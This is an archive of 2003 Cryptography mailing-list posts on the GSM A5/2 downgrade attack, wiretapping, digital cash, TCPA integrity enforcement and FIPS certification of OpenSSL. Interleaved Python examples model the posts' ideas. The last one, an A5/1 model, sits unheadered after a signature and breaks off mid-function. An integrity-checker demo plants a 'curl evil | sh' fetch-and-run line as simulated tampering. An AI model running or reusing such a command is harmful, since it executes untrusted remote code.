Re: Code breakers crack GSM cellphone encryption

2003-09-08 Thread Dave Emery
On Mon, Sep 08, 2003 at 09:55:41PM +, David Wagner wrote:
> Trei, Peter wrote:
> >Why the heck would a government agency have to break the GSM encryption
> >at all?
> 
> Well, one reason might be if that government agency didn't have lawful
> authorization from the country where the call takes place.
> 
> (say, SIGINT on GSM calls made in Libya)
> 
Just to amplify this a bit, does anyone seriously think the
NSA's satellite and embassy based cellphone interception capability is
primarily targeted against - US - GSM calls ?   Or that they can
routinely get warrants to listen in using the wired tapping
infrastructure in say Russia or France or Iran ?

And for that matter would you want the US government to grant
the Mossad or GCHQ or other allied spy agencies the right to ask for and
use CALEA wiretaps within the US on targets of interest only to THEM who
might well be law abiding US citizens minding their own business (at
least more or less) and not subject to legal US wiretaps ?

It is true that POLICE (eg law enforcement) wiretaps can be
mostly done with CALEA gear (and should be to ensure they aren't done
when not authorized by a suitable warrant), but national security and
intelligence wiretaps are a completely different kettle of fish,
particularly overseas.

And this says nothing at all about the need for tactical
military wiretaps on GSM systems under battlefield conditions when
soldiers lives may depend on determining what the enemy is saying over
cellphones used to direct attacks against friendly forces.


-- 
   Dave Emery N1PRE,  [EMAIL PROTECTED]  DIE Consulting, Weston, Mass 02493


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


Re: Digital cash and campaign finance reform

2003-09-08 Thread Bill Stewart
Steve - The whole thing is a crock, and the problems aren't technical.
None of the proposed users of the system have any desire to use it,
except perhaps as a front for other activities,
and the people who'd want them to make them use it are just meddlers.
It's funny how any time you bring up the First Amendment
in the context of tobacco advertising or internet pornography,
they say "Oh, no, it's not about that, it's about *political* speech",
but if you bring it up in the context of actual political speech,
well then, oh, no, the First Amendment is about not arresting
ranters on soapboxes in the park, or letting people print newspapers
as long as there's official identifying information about the printer,
but it's *certainly* not about actually letting people fund *electoral*
speech, because elections are *way* too important to let unapproved
members of the *public* influence the outcomes.
The couple of papers that Michael Froomkin referenced are
pretty much the canonical references to the approach you're talking about,
but just because there are academics proposing it doesn't mean
it isn't still a total crock.
Now, if you're talking about *real* campaign finance reform,
as in permitting people to engage in free speech even if it requires
money to transmit that speech to their intended recipients,
fully anonymous digital cash is useful for that, in the obvious ways,
and payer-anonymous payee-disclosing digital cash has its uses as well,
if you like to be able to trace the people you're paying,
and anonymous and pseudonymous publishing are also obviously useful,
and then of course there's Blacknet if you want the real info on candidates.
You don't need 100% technical guarantees of anonymity for most political 
work; the public can usually guess that "Paid for by Californians for 
Motherhood and Apple Pie" is probably the prison guards' union, or the major 
opponent of the candidate that the negative TV ad was about, or whatever,
but unless there's a lawsuit or actual investigative reporter, nobody's going 
to bother tracking them down.

Unfortunately, softmoney.com got snapped up a few years ago;
I'd been planning to set it up as a site for donating your two cents to
John McCain, when he was ranting about banning it.
"paid for by Californians Against Bogus Campaign Financing Regulations,
John Doe #238, Treasurer"




RE: Code breakers crack GSM cellphone encryption

2003-09-08 Thread David Honig
At 05:04 PM 9/8/03 -0400, Trei, Peter wrote:
>Why the heck would a government agency have to break the GSM encryption
>at all? The encryption is only on the airlink, and all GSM calls travel
>through 
>the POTS land line system in the clear, where they are subject to 
>warranted wiretaps.
>
>Breaking GSM is only useful if you have no access to the landline
>portion of the system.

You forget that some regimes want to listen to GSM calls
in places that they don't control.







-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


RE: Code breakers crack GSM cellphone encryption

2003-09-08 Thread Vin McLellan
At 05:04 PM 9/8/03 , Trei, Peter wrote:

> Why the heck would a government agency have to break the GSM encryption at 
> all? The encryption is only on the airlink, and all GSM calls travel 
> through the POTS land line system in the clear, where they are subject to 
> warranted wiretaps.

A government agency would be interested in breaking GSM crypto when it 
wants to target a phone call which is going through a switch and local 
wires that are under the control of another nation, or perhaps where it 
does not wish to go through whatever process might be required to gain 
legitimate or warranted access to the call's content.

A5/2 was the equivalent of 40-bit DES, presumed to be relatively weak and 
developed as an export standard.

I always thought that the important fact about the GSM secure crypto 
protocol, A5/1, was that it was reportedly chosen and adapted for this 
function by the (never identified) members of the GSM SAGE committee of 
European experts,  a multi-national group of industrial and government 
representatives.

I always presumed the SAGE group had a common interest in unwarranted 
access -- to (A5/1-secured) calls in Europe, as well as (A5/2) calls 
elsewhere -- which, for the various national security agencies involved, 
outweighed their individual interest in providing security to their 
respective citizenry.

As I recall, COMP128 came from German sources, and A5/1 was adapted from a 
French naval cipher.


> Breaking GSM is only useful if you have no access to the landline 
> portion of the system.

That's right, of course.

Crypto aside, I wondered if it might be somehow easier (legally, 
technically, procedurally) to attack the radio link of a roving GSM call -- 
even given the rapid pace of hand-off from one tower to another, as a 
mobile caller rapidly passes through several small microcell territories -- 
than it would be to recover that call by tracking it through a large number 
of successive connections to the land-line telecom GSM switches.  A friend 
was telling me that he switches from one microcell to another every couple 
hundred yards in some communities.

Anyone know?

Suerte,

_Vin


Re: fyi: bear/enforcer open-source TCPA project

2003-09-08 Thread bear


On Mon, 8 Sep 2003, Sean Smith wrote:

>How can you verify that a remote computer is the "real thing, doing
>the right thing?"

You cannot.

>In contrast, this code is part of our ongoing effort to use open
>source and TCPA to turn ordinary computers into "virtual" secure
>coprocessors---more powerful but less secure than their high-assurance
>cousins.

The correct security approach is to never give a remote machine
any data that you don't want an untrusted machine to have. Anything
short of that *will* be cracked.

Bear



Re: Digital cash and campaign finance reform

2003-09-08 Thread Joseph Ashwood
- Original Message - 
From: "Steve Schear" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
[anonymous funding of politicians]
> Comments?

Simple attack: Bob talks to soon to be bought politician. "Tomorrow you'll
receive a donation of $50k, you'll know where it came from."
Next day, buyer makes 500 $100 donations (remember you can't link him to any
transaction), 50k arrives through the mix. Politician knows where it came
from, but no one can prove it.

By implementing this we'll see a backwards trend. It will be harder to prove
the buyout (actually impossible), but the involved parties will know exactly
who did the paying. Right now you can actually see a similar usage in the
Bustamante (spelling?) campaign in the California Recall Election, the
Native Americans donated $2M to him in spite of a limit of ~22k by donating
from several people. Same method only now we know who did the paying.
Joe

Trust Laboratories
Changing Software Development
http://www.trustlaboratories.com




Re: Is cryptography where security took the wrong branch?

2003-09-08 Thread Joseph Ashwood
- Original Message - 
From: "Ian Grigg" <[EMAIL PROTECTED]>
Sent: Sunday, September 07, 2003 12:01 AM
Subject: Re: Is cryptography where security took the wrong branch?

> That's easy to see, in that if SSL was oriented
> to credit cards, why did they do SET?  (And,
> SHTTP seems much closer to that mission, on a
> quick reading, at least.)

Actually they do target very different aspects. SET, 3D-Secure, and any
other similar have a different target than SSL. To understand this it is
important to realize that instead of the usual view of two-party
transactions, credit card transactions actually take 3 parties; Issuer,
Seller, and Buyer. SSL covers the Seller-Buyer communication, and can also
be applied to the Seller-Issuer communication, but on a transaction basis it
offers nothing for the Issuer-Buyer (the important one for minimizing costs
for the Issuer).

SET/3D-Secure/etc address this through various means but the end target is
to create a pseudo-Buyer-Issuer link, through the Seller. This allows the
Issuer to minimize costs (less chance of having to make a call) and because
it is behind the scenes technology has no reason to be accompanied by a
reduction in fees (and actually because of the reduced likelihood of buyer
fraud, it may be possible to charge the seller _more_).

In the end SSL and SET/3D-Secure/etc target entirely different portions of
the problem (the former targets seller fraud against the buyer, latter
seller against issuer). Both of these are important portions, of course the
real upside of SET/3D-Secure/etc is that the seller doesn't have a choice,
and the fees in accordance with the "fraud-reduction" may very well increase
the costs to the seller, the buyer costs of course stay the same. End
result: lower fraud, increased fees->higher profit margins.

However, if it meets expectations, it is entirely possible that all
legitimate parties (non-fraud entities) will see improved profits (seller
has reduced fraud and charge-backs, buyer less likelihood of the $50
penalty, issuer higher fees). Will it meet those expectations? I have no
idea.
Joe

Trust Laboratories
Changing Software Development
http://www.trustlaboratories.com




RE: Code breakers crack GSM cellphone encryption

2003-09-08 Thread Steve Schear
At 05:04 PM 9/8/2003 -0400, Trei, Peter wrote:
> > David Honig[SMTP:[EMAIL PROTECTED] wrote:
> >
> > At 02:37 AM 9/9/03 +1000, Greg Rose wrote:
> >
> > >much more than a cellphone (without subsidies). Patenting the attack
> > >prevents the production of the "radio shack (tm) gsm scanner", so that it
> > >at least requires serious attackers, not idle retirees or jealous
> > >teenagers.
> >
> Why the heck would a government agency have to break the GSM encryption
> at all? The encryption is only on the airlink, and all GSM calls travel
> through the POTS land line system in the clear, where they are subject to
> warranted wiretaps.
>
> Breaking GSM is only useful if you have no access to the landline
> portion of the system.

LE agencies have been known to eavesdrop on cellular communications over 
the air when a wiretap might cause trouble later.  They are also thought to 
possess cellular spoofing equipment so targeted subscriber instruments can 
be captured by mobile "rogue" cell sites for fun stuff (I seem to recall 
Harris Communications made these).

steve

A foolish Constitutional inconsistency is the hobgoblin of freedom, adored 
by judges and demagogue statesmen.
- Steve Schear 



Re: Code breakers crack GSM cellphone encryption

2003-09-08 Thread David Wagner
Trei, Peter wrote:
>Why the heck would a government agency have to break the GSM encryption
>at all?

Well, one reason might be if that government agency didn't have lawful
authorization from the country where the call takes place.

(say, SIGINT on GSM calls made in Libya)

Another might be if the government agency did not want to disclose the
presence of the eavesdropping to the telephone company that is carrying
the calls.



fyi: bear/enforcer open-source TCPA project

2003-09-08 Thread Sean Smith

The Bear/Enforcer Project
Dartmouth College

http://enforcer.sourceforge.net
http://www.cs.dartmouth.edu/~sws/abstracts/msmw03.shtml

How can you verify that a remote computer is the "real thing, doing
the right thing?"  High-end secure coprocessors are expensive and
computationally limited; lower-end desktop enhancements like TCPA and
the former Palladium have been mainly limited to Windows and
proprietary development.

In contrast, this code is part of our ongoing effort to use open
source and TCPA to turn ordinary computers into "virtual" secure
coprocessors---more powerful but less secure than their high-assurance
cousins.

Our current alpha release includes the Linux Enforcer Module, a TCPA
enabled LILO, and a user-level TCPA library.  All source is available
from the SourceForge site.

The Linux Enforcer Module is a Linux Security Module designed to help
improve integrity of a computer running Linux.  The Enforcer provides a
subset of Tripwire-like functionality.  It runs continuously and as
each protected file is opened its SHA1 is calculated and compared to a
previously stored value.

The Enforcer is designed to integrate with TCPA hardware to provide a
secure boot when booted with a TCPA enabled boot loader.  TCPA
hardware can protect secrets and other sensitive data (for example,
the secrets for an encrypted loopback file system) and bind those
secrets to specific software.

When the Enforcer detects a modified file it can, on a per-file basis,
do any combination of the following: deny access to that file, write an
entry in the system log, panic the system, or lock the TCPA hardware.
If the TCPA hardware is locked then a reboot with an un-hacked system is
required to obtain access to the protected secret.

We developed our own TCPA support library concurrently with, but
independently from, IBM's recently announced TCPA library.  Our library
was an initial component of the Enforcer project.  However, our
in-kernel TCPA support and the enforcer-seal tool are derived from
IBM's TCPA code because of its ease of adaptation for in-kernel use.
We plan to use our more complete library for user-level applications.
(IBM's TCPA code and documentation is available from
.)

For more information on our project, see Dartmouth College Technical
Report TR2003-471 available from


Or contact Omen Wild at the Dartmouth PKI Lab: 
Omen Wild <[EMAIL PROTECTED]>



-- 
Sean W. Smith, Ph.D. [EMAIL PROTECTED]   
http://www.cs.dartmouth.edu/~sws/   (has ssl link to pgp key)
Department of Computer Science, Dartmouth College, Hanover NH USA
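The check the announcement above describes (hash each protected file when it
is opened, compare against a stored value, and apply any combination of deny,
log, panic and lock-the-TPM per file), as a user-space model. This is an added
example and not the Enforcer project's code: the LSM open hook is a method
call, the TPM is a flag that makes the sealed secret unreachable until a
simulated reboot into an unmodified system, and the file paths, contents and
policy are all constructed for the example.

```python
"""User-space model of an Enforcer-style integrity check (added example).

Not the Dartmouth code. The LSM file-open hook is modelled by
Enforcer.check_open(), and "lock the TCPA hardware" by a flag that makes
the sealed secret unavailable until a simulated reboot into a clean system.
"""
import enum
import hashlib
import os
import tempfile


class Action(enum.Flag):
    """Responses to a mismatch; any combination may be set per file."""
    DENY = enum.auto()
    LOG = enum.auto()
    PANIC = enum.auto()
    LOCK_TPM = enum.auto()


class IntegrityViolation(PermissionError):
    """Raised when DENY is set and the file no longer matches its stored SHA1."""


class KernelPanic(RuntimeError):
    """Stands in for a real panic."""


def sha1_of(path):
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


class Enforcer:
    def __init__(self, manifest):
        self.manifest = manifest      # path -> (expected SHA1 hex, Action flags)
        self.log = []
        self.tpm_locked = False

    def check_open(self, path):
        """Hook run on every open: True if the open may proceed."""
        entry = self.manifest.get(path)
        if entry is None:
            return True               # not a protected file
        expected, actions = entry
        if sha1_of(path) == expected:
            return True
        if Action.LOG in actions:
            self.log.append("enforcer: %s SHA1 mismatch" % path)
        if Action.LOCK_TPM in actions:
            self.tpm_locked = True    # sealed data stays unreachable until a clean boot
        if Action.PANIC in actions:
            raise KernelPanic(path)
        if Action.DENY in actions:
            raise IntegrityViolation(path)
        return True                   # LOG-only policy: record and allow

    def unseal(self, sealed_secret):
        """Access to a TPM-protected secret, e.g. an encrypted loopback key."""
        if self.tpm_locked:
            raise PermissionError("TPM locked: reboot with an unmodified system")
        return sealed_secret

    def reboot(self, clean):
        """Only a boot of an unmodified system (as measured at boot) clears the lock."""
        if clean:
            self.tpm_locked = False


def _write(path, data, mode="wb"):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, mode) as f:
        f.write(data)


def demo():
    """Protect two constructed files, tamper with both, return what the policy did."""
    root = tempfile.mkdtemp()
    binary = os.path.join(root, "sbin", "login")
    motd = os.path.join(root, "etc", "motd")
    _write(binary, b"#!/bin/sh\nexec real-login \"$@\"\n")   # constructed content
    _write(motd, b"welcome\n")
    e = Enforcer({
        binary: (sha1_of(binary), Action.DENY | Action.LOG | Action.LOCK_TPM),
        motd: (sha1_of(motd), Action.LOG),
    })
    r = {"clean_open": e.check_open(binary), "clean_unseal": e.unseal(b"k") == b"k"}
    _write(binary, b"\ncurl evil | sh\n", "ab")   # simulated tampering
    _write(motd, b"pwned\n", "ab")
    try:
        e.check_open(binary)
        r["binary_denied"] = False
    except IntegrityViolation:
        r["binary_denied"] = True
    r["motd_allowed"] = e.check_open(motd)
    r["log_entries"] = len(e.log)
    r["secret_locked"] = e.tpm_locked
    e.reboot(clean=False)
    r["locked_after_dirty_reboot"] = e.tpm_locked
    e.reboot(clean=True)
    r["locked_after_clean_reboot"] = e.tpm_locked
    return r
```

The order of the four responses matters: logging and locking happen before a
panic or a deny so that the evidence and the lock survive whichever of the two
ends the open. A log-only policy, as on the motd file, records the mismatch
and still allows the open, which is the Tripwire-like behaviour the text
mentions.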






Re: Code breakers crack GSM cellphone encryption

2003-09-08 Thread David Wagner
John Doe Number Two  wrote:
>It's nice to see someone 'discovering' what Lucky Green already figured-out
>years ago.  I wonder if they'll cut him a check.

No, no, no!  This is new work, novel and different from what was
previously known.  In my opinion, it is an outstanding piece of research.

Barkan, Biham, and Keller establish two major results:

1. A5/2 can be cracked in real-time using a passive ciphertext only
attack, due to the use of error-correcting coding before encryption.

2. All other GSM calls (including those encoded using A5/1 and A5/3) can
be cracked using an active attack.  This attack exploits a protocol flaw:
the session key derivation process does not depend on which encryption
algorithm was selected, hence one can mount an attack on A5/2, learn
the A5/2 key, and this will be the same key used for A5/1 or A5/3 calls.

(they also make other relevant observations, but the above two are
probably the most significant discoveries)

Their attacks permit eavesdropping as well as billing fraud.

See their paper at CRYPTO 2003 for more details.  I am disappointed that
you seem to be criticizing their work before even reading their paper.
I encourage you to read the paper -- it really is interesting.



Re: Code breakers crack GSM cellphone encryption

2003-09-08 Thread Bill Stewart
Trei, Peter wrote:
> Why the heck would a government agency have to break the GSM encryption
> at all? The encryption is only on the airlink, 
> and all GSM calls travel through the POTS land line system in the clear,
> where they are subject to warranted wiretaps.
> Breaking GSM is only useful if you have no access to the landline
> portion of the system.
Some governments are more concerned about using warrants
than others are.  Sometimes the ones that are concerned about them
also have police agencies that like to avoid using them.
Some phone companies are pickier about paperwork than others.
Some phone companies are faster about responding than others.
Having governments that are officially less concerned about warrants
is often correlated with having monopoly phone companies,
which is often correlated with slow bureaucratic response -
they may be extremely happy to help out the police,
but that doesn't mean it doesn't take 18 steps to accomplish it.
Landline-based wiretaps work best if you know the phone number;
over-the-air systems can be more flexible about picking up
any phone nearby, so if you see your target pick up a phone,
but don't know its phone number, they're more convenient.
And in landline-tapping environments, clever law-evaders
can usually acquire the equipment to keep switching phones.




Re: Code breakers crack GSM cellphone encryption

2003-09-08 Thread Ian Grigg
"Trei, Peter" wrote:

> Why the heck would a government agency have to break the GSM encryption
> at all?

Once upon a time, it used to be the favourite
sport of spy agencies to listen in on the
activities of other countries.  In that case,
access to the radio waves was much more juicy
than access to the POTS.

I've not heard anything explicitly on this,
but I'd expect satellites to be able to pick
up GSM calls.  (One of the things I have heard
is that the Chinese sold fibre networking to
Iraq, and the Russians sold special phones
with better crypto.  Don't know how true any
of that is.)

Also, the patent issue will work very well in
countries where there are laws against hacking
and cracking and so forth.  Rather than have
such laws subject to challenge in the supreme
court, a perp can be hit with both patent
infringement and illegal digital entry.  The
chances that anyone can defeat both of those
are slim.

(OTOH, I wonder if it is possible to patent or
licence something that depends on an illegal
act?)


iang



Re: OpenSSL *source* to get FIPS 140-2 Level 1 certification

2003-09-08 Thread Tolga Acar
Thor Lancelot Simon wrote:

> On Mon, Sep 08, 2003 at 10:49:02AM -0600, Tolga Acar wrote:
> > On a second thought, that there is no key management algorithm 
> > certified, how would one set up a SSL connection in FIPS mode?
> >
> > It seems to me that, it is not possible to have a FIPS 140 certified 
> > SSL/TLS session using the OpenSSL's certification.
>
> SSL's not certifiable, period.

I realize that, FIPS 140 addresses crypto modules with cryptographic 
algorithms, not protocols like SSL.
Although in "cryptomodule" terms "SSL's not certifiable" is not 
necessarily a correct claim. You can certainly certify one big module 
including cryptography, including the entire SSL protocol for FIPS 140. 
That would be somewhat bizarre, though.
But, that's not my point. The question was, how would one claim that he 
is using FIPS certified cryptography *under* OpenSSL, if the crypto 
layer does not have a FIPS certified key management (read RSA) algorithm?

> TLS has been held to be certifiable, and products using TLS have been
> certified.  However, it's necessary to disable any use of MD5 in the
> certificate validation path.  When I had a version of OpenSSL certified
> for use in a product at my former employer, I had to whack the OpenSSL
> source to throw an error if in FIPS mode and any part of the certificate
> validation path called the MD5 functions.  Perhaps this has been done
> in the version currently undergoing certification.

Yeah, been there.
I think my current company (Novell) suggested that, not sure what happened.

> You'll also need
> certificates that use SHA1 as the signing algorithm, which some public
> CAs cannot provide (though most can, and will if the certificate request
> itself uses SHA1 as the signing algorithm).

Well, that is sort of my point.
SHA1 is not a signature algorithm, sha1-with-rsa is, and that RSA is not 
a certified algorithm in OpenSSL's FIPS 140 certification, 
sha1-with-rsa isn't, either.
Perhaps, my understanding of the OpenSSL FIPS 140 certification is not 
entirely accurate.

> The use of MD5 in the TLS protocol itself is okay, because it is always
> used in combination with SHA1 in the PRF.  We got explicit guidance from
> NIST on this issue.

Yes, but I am addressing signature generation and verification, and more 
importantly key exchange: encrypting the PMS and such.

> Thor

- Tolga





RE: Code breakers crack GSM cellphone encryption

2003-09-08 Thread Trei, Peter
> David Honig[SMTP:[EMAIL PROTECTED] wrote:
> 
> At 02:37 AM 9/9/03 +1000, Greg Rose wrote:
> >At 05:18 PM 9/7/2003 -0700, David Honig wrote:
> >>"Laughing my ass off."  Since when do governments care about patents?
> >>How would this help/harm them from exploiting it?   Not that
> >>high-end LEOs haven't already had this capacity ---Biham et al
> >>are only the first *open* researchers to reveal this.
> >
> >Actually, patenting the method isn't nearly as silly as it sounds.
> >Produced in quantity, a device to break GSM using this attack is not going
> >to cost much more than a cellphone (without subsidies). Patenting the attack
> >prevents the production of the "radio shack (tm) gsm scanner", so that it
> >at least requires serious attackers, not idle retirees or jealous
> >teenagers.
> 
Why the heck would a government agency have to break the GSM encryption
at all? The encryption is only on the airlink, and all GSM calls travel
through the POTS land line system in the clear, where they are subject to 
warranted wiretaps.

Breaking GSM is only useful if you have no access to the landline
portion of the system.

Peter Trei





Re: Code breakers crack GSM cellphone encryption

2003-09-08 Thread David Honig
At 02:37 AM 9/9/03 +1000, Greg Rose wrote:
>At 05:18 PM 9/7/2003 -0700, David Honig wrote:
>>"Laughing my ass off."  Since when do governments care about patents?
>>How would this help/harm them from exploiting it?   Not that
>>high-end LEOs haven't already had this capacity ---Biham et al
>>are only the first *open* researchers to reveal this.
>
>Actually, patenting the method isn't nearly as silly as it sounds. Produced 
>in quantity, a device to break GSM using this attack is not going to cost 
>much more than a cellphone (without subsidies). Patenting the attack 
>prevents the production of the "radio shack (tm) gsm scanner", so that it 
>at least requires serious attackers, not idle retirees or jealous teenagers.

That sounds like a "let's make inexpensive guns illegal so only the
wealthy can have them" argument.  Or maybe a more Soviet "let's make
typewriters, xerox machines available only to those we trust".

The people who are into scanners (wealthy idle retirees, HAMS
demographically) etc. will have them, why not everyone?  In particular, and
cryptographically relevant, 
why continue a popular illusion that something is secure when it's not?   

Should Blaze have published the locksmiths' master-key secret
and his detailed exploit? 
Any "idle retiree or jealous teen" can now get into places previously
(but erroneously) believed secure.  

(If some culture wants to, it can make the practice --scanning on 900 MHz,
going through a lock to trespass, exploiting a Windows security hole, 
or Biham et al's GSM attack-- illegal.   Patenting a method is not a very
good way to implement morality.  Neither will it constrain the interested
individual.)

I hope the discoverer's intent was only to make money.



Re: OpenSSL *source* to get FIPS 140-2 Level 1 certification

2003-09-08 Thread Thor Lancelot Simon
On Mon, Sep 08, 2003 at 10:49:02AM -0600, Tolga Acar wrote:
> On a second thought, that there is no key management algorithm 
> certified, how would one set up a SSL connection in FIPS mode?
> 
> It seems to me that, it is not possible to have a FIPS 140 certified 
> SSL/TLS session using the OpenSSL's certification.

SSL's not certifiable, period.

TLS has been held to be certifiable, and products using TLS have been
certified.  However, it's necessary to disable any use of MD5 in the
certificate validation path.  When I had a version of OpenSSL certified
for use in a product at my former employer, I had to whack the OpenSSL
source to throw an error if in FIPS mode and any part of the certificate
validation path called the MD5 functions.  Perhaps this has been done
in the version currently undergoing certification.  You'll also need
certificates that use SHA1 as the signing algorithm, which some public
CAs cannot provide (though most can, and will if the certificate request
itself uses SHA1 as the signing algorithm).

The use of MD5 in the TLS protocol itself is okay, because it is always
used in combination with SHA1 in the PRF.  We got explicit guidance from
NIST on this issue.

Thor
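The PRF construction Thor refers to, written out as an added example (this is
not OpenSSL's code), together with the kind of FIPS-mode guard he describes
adding to the certificate validation path. The PRF follows RFC 2246 section
5; the guard uses OpenSSL's long name for the MD5/RSA signature algorithm,
and treating the policy as a simple deny-list on that name is an assumption
of the example, not a description of what was certified.

```python
"""TLS 1.0 PRF (RFC 2246, section 5) and a FIPS-mode signature guard.

Added example, not OpenSSL's code. It shows why MD5 inside the protocol
was acceptable to the lab: every PRF output byte is the XOR of an
HMAC-MD5 expansion and an HMAC-SHA1 expansion, each keyed with one half
of the secret, so SHA1 always covers the result.
"""
import hmac


def p_hash(hash_name, secret, seed, length):
    """P_hash(secret, seed) = HMAC(secret, A(1) + seed) + HMAC(secret, A(2) + seed) + ...
    where A(0) = seed and A(i) = HMAC(secret, A(i-1)). Output is cut to `length`."""
    out = b""
    a = seed
    while len(out) < length:
        a = hmac.new(secret, a, hash_name).digest()
        out += hmac.new(secret, a + seed, hash_name).digest()
    return out[:length]


def tls10_prf(secret, label, seed, length):
    """PRF(secret, label, seed) = P_MD5(S1, label + seed) XOR P_SHA-1(S2, label + seed).

    S1 is the first half of the secret, S2 the second half; for an odd-length
    secret the middle byte belongs to both halves, as the RFC specifies."""
    half = (len(secret) + 1) // 2
    s1, s2 = secret[:half], secret[-half:]
    md5_part = p_hash("md5", s1, label + seed, length)
    sha1_part = p_hash("sha1", s2, label + seed, length)
    return bytes(x ^ y for x, y in zip(md5_part, sha1_part))


def master_secret(pre_master_secret, client_random, server_random):
    """master_secret = PRF(pre_master_secret, "master secret",
                           ClientHello.random + ServerHello.random)[0..47]"""
    return tls10_prf(pre_master_secret, b"master secret",
                     client_random + server_random, 48)


# The guard Thor describes: in FIPS mode, any MD5-based signature anywhere in
# the certificate validation path is an error. The name is OpenSSL's long name
# for the signature algorithm; using a plain deny-list for the policy is an
# assumption of this example.
MD5_SIGNATURE_ALGS = frozenset({"md5WithRSAEncryption"})


def check_validation_path(sig_algs, fips_mode):
    """sig_algs: signatureAlgorithm of each certificate that is verified, leaf first.
    Returns True if the path may be used; raises ValueError in FIPS mode on MD5."""
    if fips_mode:
        for alg in sig_algs:
            if alg in MD5_SIGNATURE_ALGS:
                raise ValueError("FIPS mode: %s in certificate validation path" % alg)
    return True
```

The split of the secret is the detail that makes the argument work: P_MD5
never sees the second half and P_SHA1 never sees the first, and the XOR means
an attacker who could invert the MD5 side would still face the SHA1 side for
every byte. Nothing comparable protects an MD5-signed certificate, which is
why that case has to be refused outright.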



Re: Code breakers crack GSM cellphone encryption

2003-09-08 Thread Steve Schear
At 02:37 AM 9/9/2003 +1000, Greg Rose wrote:
> At 05:18 PM 9/7/2003 -0700, David Honig wrote:
> > > A copy of the research was sent to GSM authorities in order to correct the
> > > problem, and the method is being patented so that in future it can be used
> > > by the law enforcement agencies.
> >
> > "Laughing my ass off."  Since when do governments care about patents?
> > How would this help/harm them from exploiting it?   Not that
> > high-end LEOs haven't already had this capacity ---Biham et al
> > are only the first *open* researchers to reveal this.
>
> Actually, patenting the method isn't nearly as silly as it sounds. 
> Produced in quantity, a device to break GSM using this attack is not going 
> to cost much more than a cellphone (without subsidies). Patenting the 
> attack prevents the production of the "radio shack (tm) gsm scanner", so 
> that it at least requires serious attackers, not idle retirees or jealous 
> teenagers.

Not if they can type GNURadio into Google.

steve

A foolish Constitutional inconsistency is the hobgoblin of freedom, adored 
by judges and demagogue statesmen.
- Steve Schear 



Re: Digital cash and campaign finance reform

2003-09-08 Thread Ian Grigg
Steve Schear wrote:

> By combining a mandated digital cash system for contributions, a cap on the
> size of each individual contribution (perhaps as small as $100), randomized
> delays (perhaps up to a few weeks) in the "posting" of each transaction to
> the account of the counter party, it could create mix conditions which
> would thwart the ability of contributors to easily convince candidates and
> parties that they were the source of particular funds and therefore
> entitled to special treatment.

How would you audit such a system?  I'm not that up
on political cash, but I would have expected that there
would be a need to figure out where money was coming
from, by some interested third party at least.

Also there would be a need to prove that the funds
were getting there, otherwise, I'd be the first to
jump in there and run the mix.  Or, the mint.


iang



Re: Code breakers crack GSM cellphone encryption

2003-09-08 Thread Anton Stiglic

- Original Message - 
From: "Greg Rose" <[EMAIL PROTECTED]>
To: "Anton Stiglic" <[EMAIL PROTECTED]>
Cc: "John Doe Number Two" <[EMAIL PROTECTED]>;
<[EMAIL PROTECTED]>
Sent: Monday, September 08, 2003 1:39 PM
Subject: Re: Code breakers crack GSM cellphone encryption


> At 11:43 AM 9/8/2003 -0400, Anton Stiglic wrote:
> >I think this is different however.  The recent attack focused on the A5/3
> >encryption algorithm, while the work of Lucky, Briceno, Goldberg, Wagner,
> >Biryukov, Shamir (and others?) was on A5/1 and A5/2 (and other crypto
> >algorithms of GSM, such as COMP128, ...).
>
> No, that's not right. The attack *avoids* A5/3, by making the terminal end
> of the call fall back to A5/2, solving for the key in real time, then
> continuing to use the same key with A5/3.

That's what I meant to say but did not use the right words to say.
The attack does however seem novel.
I haven't seen the paper on the web yet (all I know is that it was
presented at Crypto 03 which I did not attend), I'm anxious to get my hands
on it.

--Anton
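The fall-back Greg Rose describes in the quoted paragraph above, and the
protocol flaw David Wagner summarised earlier in this digest (the session key
is derived without regard to which A5 algorithm the network later selects),
as a runnable model. This is an added example, not code from the
Barkan-Biham-Keller paper or from any poster. A5/1 is the public algorithm,
written as in the reverse-engineered reference implementation; it stands in
for the "strong" cipher because it is public, where the paper's target is
A5/3. A8 is replaced by an HMAC stand-in (an assumption, since real A8 is
operator-specific), and the real-time A5/2 key recovery is modelled as an
oracle rather than implemented, since the point here is the key reuse, not
the A5/2 cryptanalysis. The `bind_alg` option is an illustrative hardening,
not what the GSM standards bodies actually did.

```python
"""Model of the GSM key-reuse flaw behind the A5/2 downgrade attack.

Added example. A5/1 below is the public algorithm; A8 is replaced by an
HMAC stand-in (assumption), and the real-time A5/2 break is modelled as an
oracle rather than implemented.
"""
import hashlib
import hmac

# A5/1 register geometry: three LFSRs of 19, 22 and 23 bits.
R1MASK, R2MASK, R3MASK = 0x07FFFF, 0x3FFFFF, 0x7FFFFF
R1MID, R2MID, R3MID = 1 << 8, 1 << 10, 1 << 10          # majority-clocking taps
R1TAPS, R2TAPS, R3TAPS = 0x072000, 0x300000, 0x700080  # feedback taps
R1OUT, R2OUT, R3OUT = 1 << 18, 1 << 21, 1 << 22          # output (top) bits


def _parity(x):
    return bin(x).count("1") & 1


def _step(reg, mask, taps):
    """Shift one LFSR left by one and feed the tap parity into bit 0."""
    return ((reg << 1) & mask) | _parity(reg & taps)


class A51:
    """A5/1 keystream generator for one frame (Kc is 64 bits, frame is 22 bits)."""

    def __init__(self, kc, frame):
        if len(kc) != 8 or not 0 <= frame < (1 << 22):
            raise ValueError("Kc must be 8 bytes, frame a 22-bit number")
        self.r1 = self.r2 = self.r3 = 0
        for i in range(64):                      # load Kc, LSB of each byte first
            self._clock_all()
            self._xor_in((kc[i >> 3] >> (i & 7)) & 1)
        for i in range(22):                      # load the frame number
            self._clock_all()
            self._xor_in((frame >> i) & 1)
        for _ in range(100):                     # 100 majority-clocked warm-up steps
            self._clock()

    def _xor_in(self, bit):
        self.r1 ^= bit
        self.r2 ^= bit
        self.r3 ^= bit

    def _clock_all(self):
        self.r1 = _step(self.r1, R1MASK, R1TAPS)
        self.r2 = _step(self.r2, R2MASK, R2TAPS)
        self.r3 = _step(self.r3, R3MASK, R3TAPS)

    def _clock(self):
        """Irregular clocking: a register moves only if it agrees with the majority."""
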